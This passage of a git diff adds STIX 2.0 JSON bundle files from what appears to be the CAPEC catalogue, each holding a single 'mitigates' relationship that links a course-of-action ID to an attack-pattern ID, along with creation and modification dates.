"object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--516e70d6-117b-44cf-a856-6b06d88e15d1.json b/capec/relationship/relationship--516e70d6-117b-44cf-a856-6b06d88e15d1.json new file mode 100644 index 0000000000..8dd151e53b --- /dev/null +++ b/capec/relationship/relationship--516e70d6-117b-44cf-a856-6b06d88e15d1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2cf0fbab-85b3-4265-bbfa-e9eb0fc5c56d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--516e70d6-117b-44cf-a856-6b06d88e15d1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3.json b/capec/relationship/relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3.json new file mode 100644 index 0000000000..d44c281570 --- /dev/null +++ b/capec/relationship/relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3b680e3e-9364-4285-a17e-7c48779be2f1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77", + "target_ref": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8.json b/capec/relationship/relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8.json new file mode 100644 index 0000000000..117200d118 --- /dev/null +++ b/capec/relationship/relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ea1b12cc-262f-4aec-a34a-2a263cd7a798", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e686f40-c86b-4881-9137-c67559d032a0", + "target_ref": "attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5223036e-d72f-458a-b15e-7d23f915e585.json b/capec/relationship/relationship--5223036e-d72f-458a-b15e-7d23f915e585.json new file mode 100644 index 0000000000..9f1721552e --- /dev/null +++ b/capec/relationship/relationship--5223036e-d72f-458a-b15e-7d23f915e585.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8fb13b24-87ac-4786-856a-40e925f5b4f0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5223036e-d72f-458a-b15e-7d23f915e585", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4faff18-8772-40e7-babb-756dd6a05950", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5246a9a1-a828-4493-bc5d-0c344fddbfc0.json b/capec/relationship/relationship--5246a9a1-a828-4493-bc5d-0c344fddbfc0.json new file mode 100644 index 0000000000..d8635a1aff --- /dev/null +++ b/capec/relationship/relationship--5246a9a1-a828-4493-bc5d-0c344fddbfc0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--368c1bdc-43a4-4c9e-84e9-3b86135e2ecd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5246a9a1-a828-4493-bc5d-0c344fddbfc0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8", + "target_ref": "attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--52ba2e20-a0b2-4e29-9b0f-c099583a86c5.json b/capec/relationship/relationship--52ba2e20-a0b2-4e29-9b0f-c099583a86c5.json new file mode 100644 index 0000000000..3a9a6c85f6 --- /dev/null +++ b/capec/relationship/relationship--52ba2e20-a0b2-4e29-9b0f-c099583a86c5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7e97dfcd-8f60-4848-aa57-f8db48d3728b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--52ba2e20-a0b2-4e29-9b0f-c099583a86c5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--52dba241-197a-4511-b849-29a81759e57c.json b/capec/relationship/relationship--52dba241-197a-4511-b849-29a81759e57c.json new file mode 100644 index 0000000000..6315590c08 --- /dev/null +++ b/capec/relationship/relationship--52dba241-197a-4511-b849-29a81759e57c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e31378ce-b4b8-478c-a9d5-22dc8a947f65", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--52dba241-197a-4511-b849-29a81759e57c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "target_ref": "attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--52ea33a3-3eeb-447a-ad23-ea156eeeb029.json b/capec/relationship/relationship--52ea33a3-3eeb-447a-ad23-ea156eeeb029.json new file mode 100644 index 0000000000..5c32e6bc16 --- /dev/null +++ b/capec/relationship/relationship--52ea33a3-3eeb-447a-ad23-ea156eeeb029.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7ed32a07-ff09-4aa3-bead-6300df0d238e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--52ea33a3-3eeb-447a-ad23-ea156eeeb029", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--52efd59e-b4fc-42d8-bea1-0a32c41b5d8b.json b/capec/relationship/relationship--52efd59e-b4fc-42d8-bea1-0a32c41b5d8b.json new file mode 100644 index 0000000000..30eb745f5e --- /dev/null +++ b/capec/relationship/relationship--52efd59e-b4fc-42d8-bea1-0a32c41b5d8b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5095b901-6aa6-4b7a-afd5-c505c3364766", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--52efd59e-b4fc-42d8-bea1-0a32c41b5d8b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8c96de40-cb0e-47f1-832b-52967352e806", + "target_ref": "attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--53468df7-a022-4040-aa2c-33c43de2c9df.json b/capec/relationship/relationship--53468df7-a022-4040-aa2c-33c43de2c9df.json new file mode 100644 index 0000000000..ea47f87818 --- /dev/null +++ b/capec/relationship/relationship--53468df7-a022-4040-aa2c-33c43de2c9df.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--75659eab-e0a3-400b-af63-fa9d1d28c913", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--53468df7-a022-4040-aa2c-33c43de2c9df", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--53e2f392-5712-4b5b-a401-99c7f82d0925.json b/capec/relationship/relationship--53e2f392-5712-4b5b-a401-99c7f82d0925.json new file mode 100644 index 0000000000..99b225dcd6 --- /dev/null +++ b/capec/relationship/relationship--53e2f392-5712-4b5b-a401-99c7f82d0925.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b54e3b37-25d4-4ca8-bf10-3375c5de07de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--53e2f392-5712-4b5b-a401-99c7f82d0925", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9", + "target_ref": "attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--53f187f0-79bc-4065-a271-956d97ffa319.json b/capec/relationship/relationship--53f187f0-79bc-4065-a271-956d97ffa319.json new file mode 100644 index 0000000000..a4096064a7 --- /dev/null +++ b/capec/relationship/relationship--53f187f0-79bc-4065-a271-956d97ffa319.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1155db52-7b24-4e5b-b437-c08d714d32f9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--53f187f0-79bc-4065-a271-956d97ffa319", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--36186001-cd10-4add-b390-984e37252cc1", + "target_ref": "attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96.json b/capec/relationship/relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96.json new file mode 100644 index 0000000000..c2dc33f10a --- /dev/null +++ b/capec/relationship/relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f73675c6-54e0-44c5-835c-dc35e623a7a8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--540b1b69-27bb-47db-b105-9d3a598ffef3.json b/capec/relationship/relationship--540b1b69-27bb-47db-b105-9d3a598ffef3.json new file mode 100644 index 0000000000..95707c8895 --- /dev/null +++ b/capec/relationship/relationship--540b1b69-27bb-47db-b105-9d3a598ffef3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--19215f1e-b919-4e9a-88b3-668302380f0a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--540b1b69-27bb-47db-b105-9d3a598ffef3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2", + "target_ref": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--54391f32-58d7-44a3-af1d-14d83cb886e7.json b/capec/relationship/relationship--54391f32-58d7-44a3-af1d-14d83cb886e7.json new file mode 100644 index 0000000000..9d3e480fbe --- /dev/null +++ b/capec/relationship/relationship--54391f32-58d7-44a3-af1d-14d83cb886e7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3920aa8c-72a4-4371-9293-eb18585abfca", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--54391f32-58d7-44a3-af1d-14d83cb886e7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--54452909-cad4-4a57-b56d-86baaab434c2.json b/capec/relationship/relationship--54452909-cad4-4a57-b56d-86baaab434c2.json new file mode 100644 index 0000000000..c2537b3bf0 --- /dev/null +++ b/capec/relationship/relationship--54452909-cad4-4a57-b56d-86baaab434c2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--89337b27-3e4e-4f25-9b29-a1a56f54c603", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--54452909-cad4-4a57-b56d-86baaab434c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--544fb6ca-a863-4704-885c-4723b72574fa.json b/capec/relationship/relationship--544fb6ca-a863-4704-885c-4723b72574fa.json new file mode 100644 index 0000000000..0e666e07fe --- /dev/null +++ b/capec/relationship/relationship--544fb6ca-a863-4704-885c-4723b72574fa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2f43490e-5919-4b0d-8ba0-232876002837", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--544fb6ca-a863-4704-885c-4723b72574fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566", + "target_ref": "attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c.json b/capec/relationship/relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c.json new file mode 100644 index 0000000000..5ef3756b20 --- /dev/null +++ b/capec/relationship/relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0e4e69db-3b44-4a54-9751-65648fcdc8d8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7", + "target_ref": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--54873c18-4e0e-4118-94f3-6c45ae539f12.json b/capec/relationship/relationship--54873c18-4e0e-4118-94f3-6c45ae539f12.json new file mode 100644 index 0000000000..e2fc4d2b6c --- /dev/null +++ b/capec/relationship/relationship--54873c18-4e0e-4118-94f3-6c45ae539f12.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5490da08-b999-4d57-b9d6-73d052d83f4c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--54873c18-4e0e-4118-94f3-6c45ae539f12", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5492510a-bd3b-4b57-9488-9da352508d9f.json b/capec/relationship/relationship--5492510a-bd3b-4b57-9488-9da352508d9f.json new file mode 100644 index 0000000000..1cdcb741f7 --- /dev/null +++ b/capec/relationship/relationship--5492510a-bd3b-4b57-9488-9da352508d9f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--71cc2170-a622-48d7-b644-92c5f52205f8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5492510a-bd3b-4b57-9488-9da352508d9f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943", + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2.json b/capec/relationship/relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2.json new file mode 100644 index 0000000000..90b6a86342 --- /dev/null +++ b/capec/relationship/relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2d8c3c73-b139-4ff9-b64c-5d76099d679e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--550cbc7c-16f1-4496-b8bc-37eeeb3533c8.json b/capec/relationship/relationship--550cbc7c-16f1-4496-b8bc-37eeeb3533c8.json new file mode 100644 index 0000000000..f3da67f52d --- /dev/null +++ b/capec/relationship/relationship--550cbc7c-16f1-4496-b8bc-37eeeb3533c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3d769a17-f7a3-4d32-abda-57a81c594604", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--550cbc7c-16f1-4496-b8bc-37eeeb3533c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05", + "target_ref": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--55437352-14d9-4b7e-94a5-bed55b4262ce.json b/capec/relationship/relationship--55437352-14d9-4b7e-94a5-bed55b4262ce.json new file mode 100644 index 0000000000..ba975f7d03 --- /dev/null +++ b/capec/relationship/relationship--55437352-14d9-4b7e-94a5-bed55b4262ce.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4d4070ca-639c-4410-b8cb-1880c674116e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--55437352-14d9-4b7e-94a5-bed55b4262ce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f.json b/capec/relationship/relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f.json new file mode 100644 index 0000000000..c10c0de474 --- /dev/null +++ b/capec/relationship/relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ebd98283-ee1c-4510-bb2d-4f08a97d9d24", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d", + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56822943-78a1-412c-8e7c-789b8788c1f0.json b/capec/relationship/relationship--56822943-78a1-412c-8e7c-789b8788c1f0.json new file mode 100644 index 0000000000..4f45edf912 --- /dev/null +++ b/capec/relationship/relationship--56822943-78a1-412c-8e7c-789b8788c1f0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--de87fc5f-5484-47ad-91a1-48829e5d4647", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56822943-78a1-412c-8e7c-789b8788c1f0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56aef797-37d8-408d-ae9b-676eb6cf9f7d.json b/capec/relationship/relationship--56aef797-37d8-408d-ae9b-676eb6cf9f7d.json new file mode 100644 index 0000000000..e4f009eb13 --- /dev/null +++ b/capec/relationship/relationship--56aef797-37d8-408d-ae9b-676eb6cf9f7d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9ea2e606-7c00-42c3-8f16-d9084078074d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56aef797-37d8-408d-ae9b-676eb6cf9f7d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9", + "target_ref": "attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56c95b43-a838-4c15-9a28-a8335608affc.json b/capec/relationship/relationship--56c95b43-a838-4c15-9a28-a8335608affc.json new file mode 100644 index 0000000000..db9b9ef27a --- /dev/null +++ b/capec/relationship/relationship--56c95b43-a838-4c15-9a28-a8335608affc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fa2eef29-ab5a-4d13-9722-cde28f4b318f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56c95b43-a838-4c15-9a28-a8335608affc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84", + "target_ref": "attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56d1a69b-20e6-4fd2-a301-128aadab1419.json b/capec/relationship/relationship--56d1a69b-20e6-4fd2-a301-128aadab1419.json new file mode 100644 index 0000000000..f6ff6f3da4 --- /dev/null +++ b/capec/relationship/relationship--56d1a69b-20e6-4fd2-a301-128aadab1419.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f1ebfe78-b26d-4724-9563-a03f9a08f37a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56d1a69b-20e6-4fd2-a301-128aadab1419", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + 